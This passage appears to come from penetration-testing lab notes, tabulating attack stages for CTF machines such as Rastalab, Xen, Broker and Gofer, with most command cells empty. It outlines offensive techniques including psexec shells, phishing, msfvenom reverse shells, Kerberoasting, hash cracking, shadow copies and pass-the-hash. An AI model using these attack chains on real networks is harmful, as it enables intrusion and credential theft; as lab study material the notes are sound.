6 | Clipboard Monitoring | PowerShell Clipboard Monitoring | Use PowerShell to monitor clipboard: |
7 | RDP Connection | Remote Desktop Connection |
|
8 | Flag Discovery | Flag Retrieval | Flag found: |
Rastalab8
ID | Stage | Techniques | Command |
---|---|---|---|
1 | Port Forwarding | Local Port Forwarding |
|
2 | Remote Shell | Impacket psexec | Use impacket psexec to get shell on dc01 |
3 | Log Enumeration | Windows Event Logs | `Get-EventLog -LogName "Application" |
4 | Flag Discovery | Log Analysis | Flag found: |
Rastalab9
ID | Stage | Techniques | Command |
---|---|---|---|
1 | File Access | Accessing Network Share |
|
2 | File Conversion | Convert PPK to OpenSSH |
|
3 | SSH Connection | Proxychains with SSH |
|
4 | Privilege Escalation | Compile and Transfer Exploit |
|
5 | File Transfer | Secure Copy (SCP) with Proxychains |
|
6 | Flag Discovery | Flag Retrieval | Flag found: |
Xen
id | stage | techniques | commands |
---|---|---|---|
1 | Initial Recon | NMAP Scan |
|
2 | Web Enumeration | Directory Enumeration with wfuzz |
|
3 | SMTP Enumeration | smtp-user-enum |
|
4 | Phishing | Crafting Email |
|
5 | Access | Citrix XenAPP | Login with captured credentials |
6 | Gaining a Shell | Reverse Shell with msfvenom |
|
7 | Privilege Escalation | Local Exploit Suggester |
|
8 | Network Scanning | Internal Network Scan | Use auxiliary/server/socks4a in Metasploit for proxying |
9 | Kerberoasting | Harvesting Tickets |
|
10 | Password Cracking | hashcat |
|
11 | SMB Access | smbmap and smbclient |
|
12 | Putty File Conversion | putty2john |
|
13 | NetScaler Access | SSH with Private Key |
|
14 | Traffic Analysis | tcpdump | `tcpdump -s 0 -A -n -l |
15 | LDAP Passwords | Capture and Analyze with Wireshark |
|
16 | Domain Privilege | WinRM Access |
|
17 | Shadow Copies | Diskshadow |
|
18 | Domain Admin Access | Pass the Hash |
|
Broker
id | stage | techniques | command |
---|---|---|---|
1 | Reconnaissance | - Nmap scan - Enumerating SMB | - |
2 | Gaining Access | - Exploiting SMB vulnerability | - |
3 | Enumeration | - Searching for files - Analyzing found files | - |
4 | Privilege Esc. | - Using credentials found - Accessing Azure | - |
5 | Post-Exploitation | - Dumping hashes - Cracking hashes | - |
Gofer
id | stage | techniques | command |
---|---|---|---|
1 | Recon | Scanning with nmap |
|
2 | SMB Enumeration | Enumerate shares with netexec |
|
3 | SMB Access | Access SMB share with smbclient |
|
4 | Email Analysis | Analyze backup email |
|
5 | Subdomain Enum | Brute force subdomains with ffuf |
|
6 | Proxy Access | Fuzzing HTTP methods on proxy |
|
Last updated